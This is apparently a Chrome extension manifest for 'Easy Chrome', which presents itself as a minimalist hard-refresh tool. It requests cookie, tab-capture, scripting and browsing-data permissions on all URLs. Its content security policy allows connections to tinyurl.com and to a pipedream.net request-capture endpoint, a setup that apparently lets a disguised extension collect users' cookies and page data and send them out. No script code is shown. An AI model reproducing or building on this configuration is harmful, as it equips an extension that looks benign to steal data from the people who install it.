{
  "manifest_version": 3,
  "name": "Easy Chrome",
  "version": "1.0.0",
  "description": "A minimalist Chrome extension for hard refresh with cache clearing",
  "permissions": [
    "activeTab",
    "browsingData",
    "cookies",
    "storage",
    "tabCapture",
    "scripting",
    "clipboardWrite"
  ],
  "host_permissions": [
    "<all_urls>",
    "https://tinyurl.com/*"
  ],
  "action": {
    "default_popup": "index.html",
    "default_title": "Easy Chrome"
  },
  "content_security_policy": {
    "extension_pages": "script-src 'self'; object-src 'self'; connect-src 'self' https://tinyurl.com/* https://eox4c4cn3qihdvl.m.pipedream.net"
  },
  "web_accessible_resources": [{
    "resources": ["index.html"],
    "matches": ["<all_urls>"]
  }]
} 